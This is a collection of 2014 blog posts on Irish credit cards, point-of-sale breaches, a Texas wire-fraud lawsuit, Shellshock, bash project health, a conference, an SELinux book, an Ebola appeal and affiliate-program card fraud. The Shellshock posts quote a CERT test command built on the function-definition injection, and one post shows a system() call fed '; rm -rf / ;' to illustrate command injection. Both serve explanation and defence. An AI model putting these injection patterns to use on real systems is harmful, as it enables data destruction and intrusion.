Operations on most credit cards are on the other hand free; there are sometimes charges for "oversea usage" (foreign transactions), and you are charged interests if you don't pay the full amount of the debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year. A whole lot more than Italy where it was €1.81 until they dropped it on the floor. So my requirements on a credit card are to essentially hide as much as possible these costs. Which essentially mean that just getting a standard AIB card is not going to be very useful: yes I would be saving money after the first 150 operations, but I would be saving more to save enough to keep those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point every €2 spent. Since for each point you get a €.01 discount at end of quarter, it's almost like a cashback, as long as you buy your groceries from Tesco (that I do, because it's handy to have the delivery rather than having to go out for that, especially for things that are frozen or that weight a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to get back the stamp duty price with just the cashback, but it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, mobile phone, …

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, adding a raise at work, and the results have been positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that ensures you're in control of the bank account, a proof of address, and a proof of identity.

The first is kinda obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill — the problem starts when you notice that they ask you for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more — the bank was the hardest to convince, for over an year they kept sending me a paper letter for every single wire I received with the exception of my pay, which included money coming from colleagues when I acted as a payment hub, PayPal transfer for verification purposes and Amazon KDP revenue, one per country! Luckily, they accepted a color printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving license or any other Irish ID. I made a proper copy of it, in color, and brought it to my doctor for certification, he stamped and dated and declared, but it was not okay. I brought it to An Post – the Irish postal service – and told them that Tesco wanted a specific declaration on it, and to see the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and I repeated Tesco's request; not only they refused to comply, but they told me that they are not allowed to do what Tesco was asking me to make them do, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me, having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages, to "friends or family" — in my case, the target would have been my brother in law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending four more cards also to friends and family, and in particular I wanted to have one sent to my mother, so that she can have a way to pay for things and debit them to me so I can help her out. Of course as I said it has a cost, and a hefty one. Ont he other hand, it allows you one more trick: you can pay for the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in an year to pay for it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank should be taking on the onus of paying for the first €15k debt I would incur and wouldn't be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders in other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which had feeble, laughable rewards program, but at least I have it, and it should be able to repay itself. I'm up to find a MasterCard card I can have to hedge my bets on the acceptance of the card – turns out that Visa is not well received in the Netherlands and in Germany – and that can repay itself for the stamp duty.


Signature Systems Inc., the point-of-sale vendor blamed for a credit and debit card breach involving some 216 Jimmy John’s sandwich shop locations, now says the breach also may have jeopardized customer card numbers at nearly 100 other independent restaurants across the country that use its products.

Earlier this week, Champaign, Ill.-based Jimmy John’s confirmed suspicions first raised by this author on July 31, 2014: That hackers had installed card-stealing malware on cash registers at some of its store locations. Jimmy John’s said the intrusion — which lasted from June 16, 2014 to Sept. 5, 2014 — occurred when hackers compromised the username and password needed to remotely administer point-of-sale systems at 216 stores.

Those point-of-sale systems were produced by Newtown, Pa., based payment vendor Signature Systems. In a statement issued in the last 24 hours, Signature Systems released more information about the break-in, as well as a list of nearly 100 other stores — mostly small mom-and-pop eateries and pizza shops — that were compromised in the same attack.

“We have determined that an unauthorized person gained access to a user name and password that Signature Systems used to remotely access POS systems,” the company wrote. “The unauthorized person used that access to install malware designed to capture payment card data from cards that were swiped through terminals in certain restaurants. The malware was capable of capturing the cardholder’s name, card number, expiration date, and verification code from the magnetic stripe of the card.”

Meanwhile, there are questions about whether Signature’s core product — PDQ POS — met even the most basic security requirements set forth by the PCI Security Standards Council for point-of-sale payment systems. According to the council’s records, PDQ POS was not approved for new installations after Oct. 28, 2013. As a result, any Jimmy John’s stores and other affected restaurants that installed PDQ’s product after the Oct. 28, 2013 sunset date could be facing fines and other penalties.

This snapshot from the PCI Council shows that PDQ POS was not approved for new installations after Oct. 28, 2013.
What’s more, the company that performed the security audit on PDQ — a now-defunct firm called Chief Security Officers — appears to be the only qualified security assessment firm to have had their certification authority revoked (PDF) by the PCI Security Standards Council.

In response to inquiry from KrebsOnSecurity, Jimmy John’s noted that of the 216 impacted stores, 13 were opened after October 28, 2013.

“We understood, from our point of sale technology vendor, that payment systems installed in those stores, as with all locations, were PCI compliant,” Jimmy Johns said in a statement. “We are working independently, and moving as quickly as possible, to install PCI compliant stand-alone payment terminals in those 13 stores.  This is being overseen by Jimmy John’s director of information technology, who will confirm completion of this work directly with each location.  As part of our broader response to the security incident, action has already been taken in those 13 stores, as well as the other impacted locations, to remove malware, and to install and assure the use of dual-factor authentication for remote access and encrypted swipe technology for store purchases.  In addition, the systems used in all of our stores are scanned every day for malware.”

For its part, Signature Systems says it has been developing a new payment application that features card readers that utilize point-to-point encryption capable of blocking point-of-sale malware.


Tech media has been all the rage this year with trying to hype everything out there as the end of the Internet of Things or the nail on the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason why the security issues found had been considered so nasty is because we know they are widely used.

First there was Heartbleed with its discoverers deciding to spend time setting up a cool name and logo and website for, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificate. This spawned some interest around OpenSSL at least, including the OpenBSD fork which I'm still not sure is going to stick around or not.

Just few weeks ago a dump of passwords caused major stir as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault if the photos of a bunch of celebrities were stolen and published on a bunch of sites — and will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about shellshock which I already dug into. What I promised on that post is looking at the problem from the angle of the project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and cater for corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers don't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is FSF's choice of UNIX shell. The fact that the man page states clearly It's too big and too slow. should tip people off but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using them — but that's also a big problem that caused this particular issue.

The health of bash was not considered good by anybody involved with it on a distribution level. It certainly was not considered good for me, as I moved to zsh years and years ago, and I have been working for over five years years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer as the GNU website calls him, Chet Ramey – and the sole point of contact for him are the mailing lists. The code is released in dumps: a release tarball on the minor version, then every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can notice this as when emerging bash, you'll see all the patches being applied one on top of the other.

There is no public SCM — yes there is a GIT "repository", but it's essentially just an import of a given release tarball, and then each released patch applied on top of it as a commit. Since these patches represent a whole point release, and they may be fixing different bugs, related or not, it's definitely not as useful has having a repository with the intent clearly showing, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff in code dumps.

This is not completely unknown in the GNU sphere, glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts sanity is being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years, not the particular vulnerability but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers up to now (it's done now), and I have been pushing for Gentoo to move to /bin/sh being provided by dash for a while, at the same time Debian did it already, and the result is that the vulnerability for them is way less scary.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but it's not developed like many other projects in the open but behind closed doors, with only one single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than you involved, and review publicly the patches that you're sent!


As if consumers weren’t already suffering from breach fatigue: Experts warn that attackers are exploiting a critical, newly-disclosed security vulnerability present in countless networks and Web sites that rely on Unix and Linux operating systems. Experts say the flaw, dubbed “Shellshock,” is so intertwined with the modern Internet that it could prove challenging to fix, and in the short run is likely to put millions of networks and countless consumer records at risk of compromise.

The bug is being compared to the recent Heartbleed vulnerability because of its ubiquity and sheer potential for causing havoc on Internet-connected systems — particularly Web sites. Worse yet, experts say the official patch for the security hole is incomplete and could still let attackers seize control over vulnerable systems.

The problem resides with a weakness in the GNU Bourne Again Shell (Bash), the text-based, command-line utility on multiple Linux and Unix operating systems. Researchers discovered that if Bash is set up to be the default command line utility on these systems, it opens those systems up to specially crafted remote attacks via a range of network tools that rely on it to execute scripts, from telnet and secure shell (SSH) sessions to Web requests.

According to several security firms, attackers are already probing systems for the weakness, and that at least two computer worms are actively exploiting the flaw to install malware. Jaime Blasco, labs director at AlienVault, has been running a honeypot on the vulnerability since yesterday to emulate a vulnerable system.

“With the honeypot, we found several machines trying to exploit the Bash vulnerability,” Blasco said. “The majority of them are only probing to check if systems are vulnerable. On the other hand, we found two worms that are actively exploiting the vulnerability and installing a piece of malware on the system. This malware turns the systems into bots that connect to a C&C server where the attackers can send commands, and we have seen the main purpose of the bots is to perform distributed denial of service attacks.”

The vulnerability does not impact Microsoft Windows users, but there are patches available for Linux and Unix systems. In addition, Mac users are likely vulnerable, although there is no official patch for this flaw from Apple yet. I’ll update this post if we see any patches from Apple.

Update, Sept. 29 9:06 p.m. ET: Apple has released an update for this bug, available for OS X Mavericks, Mountain Lion, and Lion.

The U.S.-CERT’s advisory includes a simple command line script that Mac users can run to test for the vulnerability. To check your system from a command line, type or cut and paste this text:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If the system is vulnerable, the output will be:

vulnerable
 this is a test
An unaffected (or patched) system will output:

 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test
US-CERT has a list of operating systems that are vulnerable. Red Hat and several other Linux distributions have released fixes for the bug, but according to US-CERT the patch has an issue that prevents it from fully addressing the problem.

The Shellshock bug is being compared to Heartbleed because it affects so many systems; determining which are vulnerable and developing and deploying fixes to them is likely to take time. However, unlike Heartbleed, which only allows attackers to read sensitive information from vulnerable Web servers, Shellshock potentially lets attackers take control over exposed systems.

“This is going to be one that’s with us for a long time, because it’s going to be in a lot of embedded systems that won’t get updated for a long time,” said Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley. “The target computer has to be accessible, but there are a lot of ways that this turns accessibility into full local code execution. For example, one could easily write a scanner that would basically scan every Web site on the planet for vulnerable (Web) pages.”

Stay tuned. This one could get interesting very soon.


Today's news all over the place has to do with the nasty bash vulnerability that has been disclosed and now makes everybody go insane. But around this, there's more buzz than actual fire. The problem I think is that there are a number of claims around this vulnerability that are true all by themselves, but become hysteria when mashed together. Tip of the hat to SANS that tried to calm down the situation as well.

Yes, the bug is nasty, and yes the bug can lead to remote code execution; but not all the servers in the world are vulnerable. First of all, not all the UNIX systems out there use bash at all: the BSDs don't have bash installed by default, for instance, and both Debian and Ubuntu have been defaulting to dash for their default shell in years. This is important because the mere presence of bash does not make a system vulnerable. To be exploitable, on the server side, you need at least one of two things: a bash-based CGI script, or /bin/sh being bash. In the former case it becomes obvious: you pass down the CGI variables with the exploit and you have direct remote code execution. In the latter, things are a tad less obvious, and rely on the way system() is implemented in C and other languages: it invokes /bin/sh -c {thestring}.

Using system() is already a red flag for me in lots of server-side software: input sanitization is essential in that situation, as otherwise passing user-provided strings in a system() call makes it trivial to implement remote code execution, think of a software using system("convert %s %s-thumb.png") with an user provided string, and let the user provide ; rm -rf / ; as their input… can you see the problem? But with this particular bash bug, you don't need user-supplied strings to be passed to system(), the mere call will cause the environment to be copied over and thus the code executed. But this relies on /bin/sh to be bash, which is not the case for BSDs, Debian, Ubuntu and a bunch of other situations. But this also requires for the user to be able to change the environment variable.

This does not mean that there is absolutely no risk for Debian or Ubuntu users (or even FreeBSD, but that's a different problem): if you control an environment variable, and somehow the web application invokes (even indirectly) a bash script (through system() or otherwise), then you're also vulnerable. This can be the case if the invoked script has #!/bin/bash explicitly in it. Funnily enough, this is how most clients are vulnerable to this problem: the ISC DHCP client dhclient uses a helper script called dhclient-script to set some special options it receives from the server; at least in the Debian/Ubuntu packages of it, the script uses #!/bin/bash explicitly, making those systems vulnerable even if their default shell is not bash.

But who seriously uses CGI nowadays in production? Turns out that a bunch of people using WordPress do, to run PHP — and I"m sure there are scripts using system(). If this is a nail on the coffin of something, my opinion is that it should be on the coffin of the self-hosting mantra that people still insist on.

On the other hand, the focus of the tech field right now is CGI running in small devices, like routers, TVs, and so on so forth. It is indeed the case that in the majority of those devices implement their web interfaces through CGI, because it's simple and proven, and does not require complex web servers such as Apache. This is what scared plenty of tech people, but it's a scare that has not been researched properly either. While it's true that most of my small devices use CGI, I don't think any of them uses bash. In the embedded world, the majority of the people out there wouldn't go near bash with a 10' pole: it's slow, it's big, and it's clunky. If you're building an embedded image, you probably have already busybox around, and you may as well use it as your shell. It also allows you to use the in-process version of most commands without requiring a full fork.

It's easy to see how you go from A to Z here: "bash makes CGI vulnerable", "nearly all embedded devices use CGI" become "bash makes nearly all embedded devices vulnerable". But that's not true, as SANS points out, it's a minimal part of the devices that is actually vulnerable to this attack. Which does not mean the attack is irrelevant. It's important, and it should tell us many things.

I'll be writing again regarding "project health" and talking a bit more about bash as a project. In the mean time, make sure you update, don't believe the first news of "all fixed" (as Tavis pointed out that the first fix was not thought-out properly) and make sure you don't self-host the stuff you want to keep out of the cloud in a server you upgrade once an year.


BASH shell bug Official PC-BSD Blog | 2014-09-25 19:33 UTC

As many of you are probably aware, there is a serious security issue that is currently all over the web regarding the GNU BASH shell.  We at the PC-BSD project are well aware of the issue, a fix is already in place to plug this security hole, and packages with this fix are currently building. Look for an update to your BASH shell within the next 24 hours in the form of a package update.

As a side note: nothing written by the PC-BSD project uses BASH in any way — and BASH is not built-in to the  FreeBSD operating system itself (it is an optional port/package), so the level of severity of this bug is lower on FreeBSD than on other operating systems.

According to the FreeBSD mailing list: Bryan Drewery has already sent a notice that the port is fixed in FreeBSD. However, since he also added some good recommendations in the email for BASH users, we decided to copy that email here for anyone else that is interested.
_______________

From: Bryan Drewery — FreeBSD mailing list

The port is fixed with all known public exploits. The package is
building currently.

However bash still allows the crazy exporting of functions and may still
have other parser bugs. I would recommend for the immediate future not
using bash for forced ssh commands as well as these guidelines:

1. Do not ever link /bin/sh to bash. This is why it is such a big
problem on Linux, as system(3) will run bash by default from CGI.
2. Web/CGI users should have shell of /sbin/nologin.
3. Don’t write CGI in shell script / Stop using CGI
4. httpd/CGId should never run as root, nor “apache”. Sandbox each
application into its own user.
5. Custom restrictive shells, like scponly, should not be written in bash.
6. SSH authorized_keys/sshd_config forced commands should also not be
written in bash.
_______________

For more information the bug itself you can visit arstechnica and read the article by clicking the link below.

http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/


Conferencing Flameeyes's Weblog | 2014-09-25 18:57 UTC

This past weekend I had the honor of hosting the VideoLAN Dev Days 2014 in Dublin, in the headquarters of my employer. This is the first time I organize a conference (or rather help organize it, Audrey and our staff did most of the heavy lifting), and I made a number of mistakes, but I think I can learn from them and be better the next time I'll try something like this.


Photo credit: me
Organizing an event in Dublin has some interesting and not-obvious drawbacks, one of which is the need for a proper visa for people who reside in Europe but are not EEA citizens, thanks to the fact that Ireland is not part of Schengen. I was expecting at least UK residents not to need any scrutiny, but Derek proved me wrong as he had to get an (easy) visa at entrance.

Getting just shy of a hundred people in a city like Dublin, which is by far not a metropolis like Paris or London would be is an interesting exercise, yes we had the space for the conference itself, but finding hotels and restaurants for the amount of people became tricky. A very positive shout out is due to Yamamori Sushi that hosted the whole of us without a fixed menu and without a hitch.

As usual, meeting in person with the people you work with in open source is a perfect way to improve collaboration — knowing how people behave face to face makes it easier to understand their behaviour online, which is especially useful if the attitudes can be a bit grating online. And given that many people, including me, are known as proponent of Troll-Driven Development – or Rant-Driven Development given that people like Anon, redditors and 4channers have given an even worse connotation to Troll – it's really a requirement, if you are really interested to be part of the community.

This time around, I was even able to stop myself from gathering too much swag! I decided not to pick up a hoodie, and leave it to people who would actually use it, although I did pick up a Gandi VLC shirt. I hope I'll be able to do that at LISA as I'm bound there too, and last year I came back with way too many shirts and other swag.


A Texas bank that’s suing a customer to recover $1.66 million spirited out of the country in a 2012 cyberheist says it now believes the missing funds are still here in the United States — in a bank account that’s been frozen by the federal government as part of an FBI cybercrime investigation.

In late June 2012, unknown hackers broke into the computer systems of Luna & Luna, LLP, a real estate escrow firm based in Garland, Texas. Unbeknownst to Luna, hackers had stolen the username and password that the company used to managed its account at Texas Brand Bank (TBB), a financial institution also based in Garland.

Between June 21, 2012 and July 2, 2012, fraudsters stole approximately $1.75 million in three separate wire transfers. Two of those transfers went to an account at the Industrial and Commercial Bank of China. That account was tied to the Jixi City Tianfeng Trade Limited Company in China. The third wire, in the amount of $89,651, was sent to a company in the United States, and was recovered by the bank.

Jixi is in the Heilongjiang province of China on the border with Russia, a region apparently replete with companies willing to accept huge international wire transfers without asking too many questions. A year before this cyberheist took place, the FBI issued a warning that cyberthieves operating out of the region had been the recipients of approximately $20 million in the year prior — all funds stolen from small to mid-sized businesses through a series of fraudulent wire transfers sent to Chinese economic and trade companies (PDF) on the border with Russia.

Luna became aware of the fraudulent transfers on July 2, 2012, when the bank notified the company that it was about to overdraw its accounts. The theft put Luna & Luna in a tough spot: The money the thieves stole was being held in escrow for the U.S. Department of Housing and Urban Development (HUD). In essence, the crooks had robbed Uncle Sam, and this was exactly the argument that Luna used to talk its bank into replacing the missing funds as quickly as possible.

“Luna argued that unless TBB restored the funds, Luna and HUD would be severely damaged with consequences to TBB far greater than the sum of the swindled funds,” TBB wrote in its original complaint (PDF). TBB notes that it agreed to reimburse the stolen funds, but that it also reserved its right to legal claims against Luna to recover the money.

When TBB later demanded repayment, Luna refused. The bank filed suit on July 1, 2013, in state court, suing to recover the approximately $1.66 million that it could not claw back, plus interest and attorney’s fees.

For the ensuing year, TBB and Luna wrangled in the courts over the venue of the trial. Luna also counterclaimed that the bank’s security was deficient because it only relied on a username and password, and that TBB should have flagged the wires to China as highly unusual.

TBB notes that per a written agreement with the bank, Luna had instructed the bank to process more than a thousand wire transfers from its accounts to third-party accounts. Further, the bank pointed out that Luna had been offered but refused “dual controls,” a security measure that requires two employees to sign off on all wire transfers before the money is allowed to be sent.

In August, Luna alerted (PDF) the U.S. District Court for the Northern District of Texas that in direct conversations with the FBI, an agent involved in the investigation disclosed that the $1.66 million in stolen funds were actually sitting in an account at JPMorgan Chase, which was the receiving bank for the fraudulent wires. Both Luna and TBB have asked the government to consider relinquishing the funds to help settle the lawsuit.

The FBI did not return calls seeking comment. The Office of the U.S. attorney for the Northern District of Texas, which is in the process of investigating potential criminal claims related to the fraudulent transfers, declined to comment except to say that the case is ongoing and that no criminal charges have been filed to date.

As usual, this cyberheist resulted from missteps by both the bank and the customer. Dual controls are a helpful — but not always sufficient — security control that Luna should have adopted, particularly given how often these cyberheists are perpetrated against title and escrow firms. But it is galling that it is easier to find more robust, customer-facing security controls at your average email or other cloud service provider than it is at one of thousands of financial institutions in the United States.

If you run a small business and are managing your accounts online, you’d be wise to expect a similar attack on your own accounts and prepare accordingly. That means taking your business to a bank that offers more than just usernames, passwords and tokens for security. Shop around for a bank that lets you secure your transfers with some sort of additional authentication step required from a mobile device. These security methods can be defeated of course, but they present an extra hurdle for the bad guys, who probably are more likely to go after the lower-hanging fruit at thousands of other financial institutions that don’t offer more modern security approaches.

But if you’re expecting your bank to protect your assets should you or one of your employees fall victim to a malware phishing scheme, you could be in for a rude awakening. Keep a close eye on your books, require that more than one employee sign off on all large transfers, and consider adopting some of these: Online Banking Best Practices for Businesses.


Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covered SELinux administration commands and focuses on Linux administrators that need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in the book: policy development. So in the spring this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and tuning of SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and even the reference platform) even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe in the book works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book development contributed well to the final result (something that I overlooked a bit in the first time, so I re-re-reviewed changes over and over again this time – after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting) but for me, this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I hope it to be.


More than seven weeks after this publication broke the news of a possible credit card breach at nationwide sandwich chain Jimmy John’s, the company now confirms that a break-in at one of its payment vendors jeopardized customer credit and debit card information at 216 stores.

On July 31, KrebsOnSecurity reported that multiple banks were seeing a pattern of fraud on cards that were all recently used at Jimmy John’s locations around the country. That story noted that the company was working with authorities on an investigation, and that multiple Jimmy John’s stores contacted by this author said they ran point-of-sale systems made by Newtown, Pa.-based Signature Systems.

In a statement issued today, Champaign, Ill. based Jimmy John’s said customers’ credit and debit card data was compromised after an intruder stole login credentials from the company’s point-of-sale vendor and used these credentials to remotely access the point-of-sale systems at some corporate and franchised locations between June 16, 2014 and Sept. 5, 2014.

“Approximately 216 stores appear to have been affected by this event,” Jimmy John’s said in the statement. “Cards impacted by this event appear to be those swiped at the stores, and did not include those cards entered manually or online. The credit and debit card information at issue may include the card number and in some cases the cardholder’s name, verification code, and/or the card’s expiration date. Information entered online, such as customer address, email, and password, remains secure.”

The company has posted a listing on its Web site — jimmyjohns.com — of the restaurant locations affected by the intrusion. There are more than 1,900 franchised Jimmy John’s locations across the United States, meaning this breach impacted roughly 11 percent of all stores.

The statement from Jimmy John’s doesn’t name the point of sale vendor, but company officials confirm that the point-of-sale vendor that was compromised was indeed Signature Systems. Officials from Signature Systems could not be immediately reached for comment, and it remains unclear if other companies that use its point-of-sale solutions may have been similarly impacted.

Point-of-sale vendors remain an attractive target for cyber thieves, perhaps because so many of these vendors enable remote administration on their hardware and yet secure those systems with little more than a username and password — and often easy-to-guess credentials to boot.

Last week, KrebsOnSecurity reported that a different hacked point-of-sale provider was the driver behind a breach that impacted more than 330 Goodwill locations nationwide. That breach, which targeted payment vendor C&K Systems Inc., persisted for 18 months, and involved two other as-yet unnamed C&K customers.




Mehr als 15 Cent Hanno's blog | 2014-09-22 14:48 UTC

Seit Monaten können wir fast täglich neue Schreckensmeldungen über die Ebola-Ausbreitung lesen. Ich denke die muss ich hier nicht wiederholen.

Ebola ist für viele von uns - mich eingeschlossen - weit weg. Und das nicht nur im räumlichen Sinne. Ich habe noch nie einen Ebola-Patienten gesehen, über die betroffenen Länder wie Sierra Leone, Liberia oder Guinea weiß ich fast nichts. Ähnlich wie mir geht es sicher vielen. Ich habe viele der Meldungen auch nur am Rande wahrgenommen. Aber eine Sache habe ich mitgenommen: Das Problem ist nicht das man nicht wüsste wie man Ebola stoppen könnte. Das Problem ist dass man es nicht tut, dass man denen, die helfen wollen - oftmals unter Einsatz ihres eigenen Lebens - nicht genügend Mittel zur Verfügung stellt.

Eine Zahl, die ich in den letzten Tagen gelesen habe, beschäftigt mich: Die Bundesregierung hat bisher 12 Millionen Euro für die Ebola-Hilfe zur Verfügung gestellt. Das sind umgerechnet etwa 15 Cent pro Einwohner. Mir fehlen die Worte das adäquat zu beschreiben. Es ist irgendwas zwischen peinlich, verantwortungslos und skandalös. Deutschland ist eines der wohlhabendsten Länder der Welt. Vergleiche mit Bankenrettungen oder Tiefbahnhöfen erspare ich mir jetzt.

Ich habe gestern einen Betrag an Ärzte ohne Grenzen gespendet. Ärzte ohne Grenzen ist soweit ich das wahrnehme im Moment die wichtigste Organisation, die vor Ort versucht zu helfen. Alles was ich über Ärzte ohne Grenzen weiß gibt mir das Gefühl dass mein Geld dort gut aufgehoben ist. Es war ein Betrag, der um mehrere Größenordnungen höher als 15 Cent war, aber es war auch ein Betrag, der mir mit meinen finanziellen Möglichkeiten nicht weh tut.

Ich finde das eigentlich nicht richtig. Ich finde es sollte selbstverständlich sein dass in so einer Notsituation die Weltgemeinschaft hilft. Es sollte nicht von Spenden abhängen, ob man eine tödliche Krankheit bekämpft oder nicht. Ich will eigentlich mit meinen Steuergeldern für so etwas zahlen. Aber die Realität ist: Das geschieht im Moment nicht.

Ich schreibe das hier nicht weil ich betonen möchte wie toll ich bin. Ich schreibe das weil ich Dich, der das jetzt liest, bitten möchte, das selbe tust. Ich glaube jeder, der hier mitliest, ist in der Lage, mehr als 15 Cent zu spenden. Spende einen Betrag, der Dir angesichts Deiner finanziellen Situation bezahlbar und angemessen erscheint. Jetzt sofort. Es dauert nur ein paar Minuten:

Online für Ärzte ohne Grenzen spenden

(Ich freue mich wenn dieser Beitrag verbreitet / geteilt wird - zum Beispiel mit dem Hashtag #mehrals15cent)


Hardly a week goes by when I don’t hear from a reader wondering about the origins of a bogus credit card charge for $49.95 or some similar amount for a product they never ordered. As this post will explain, such charges appear to be the result of crooks trying to game various online affiliate programs by using stolen credit cards.

Bogus $49.95 charges for herbal weight loss products like these are showing up on countless consumer credit statements.
Most of these charges are associated with companies marketing products of dubious value and quality, typically by knitting a complex web of front companies, customer support centers and card processing networks. Whether we’re talking about a $49.95 payment for a bottle of overpriced vitamins, $12.96 for some no-name software title, or $9.84 for a dodgy Internet marketing program, the unauthorized charge usually is for a good or service that is intended to be marketed by an online affiliate program.

Affiliate programs are marketing machines built to sell a huge variety of products or services that are often of questionable quality and unknown provenance. Very often, affiliate programs are promoted using spam, and the stuff pimped by them includes generic prescription drugs, vitamins and “nutriceuticals,” and knockoff designer purses, watches, handbags, shoes and sports jerseys.

At the core of the affiliate program is a partnership of convenience: The affiliate managers handle the boring backoffice stuff, including the customer service, product procurement (suppliers) and order fulfillment (shipping). The sole job of the “affiliates” — the commission-based freelance marketers who sign up to promote whatever is being sold by the affiliate program — is to drive traffic and sales to the program.

THE NEW FACE OF SPAM

It is no surprise, then, that online affiliate programs like these often are overrun with scammers, spammers and others easily snagged by the lure of get-rich-quick schemes. In June, I began hearing from dozens of readers about unauthorized charges on their credit card statements for $49.95. The charges all showed up alongside various toll-free 888- numbers or names of customer support Web sites, such as supportacr[dot]com and acrsupport[dot]com. Readers who called these numbers or took advantage of the chat interfaces at these support sites were all told they’d ordered some kind of fat-burning pill or vitamin from some random site, such as greenteahealthdiet[dot]com or naturalfatburngarcinia[dot]com.

Those sites were among tens of thousands that are being promoted via spam, according to Gary Warner, chief technologist at Malcovery, an email security firm. The Web site names themselves are not included in the spam; rather, the spammers include a clickable URL for a hacked Web site that, when visited, redirects the user to the pill shop’s page. This redirection is done to avoid having the pill shop pages indexed by anti-spam filters and other types of blacklists used by security firms, Warner said.

The spam advertising these pill sites is not typical junk email blasted by botnet-infected home PCs, but rather is mostly “Webspam” sent via hacked Webmail accounts, said Damon McCoy, an assistant professor of computer science at George Mason University.

“Herbal spam from compromised Webmail accounts is a huge problem,” said McCoy, who has co-authored numerous studies on dodgy affiliate programs.

A support Web site named after the same number that appears on the “customer’s” credit card statement.
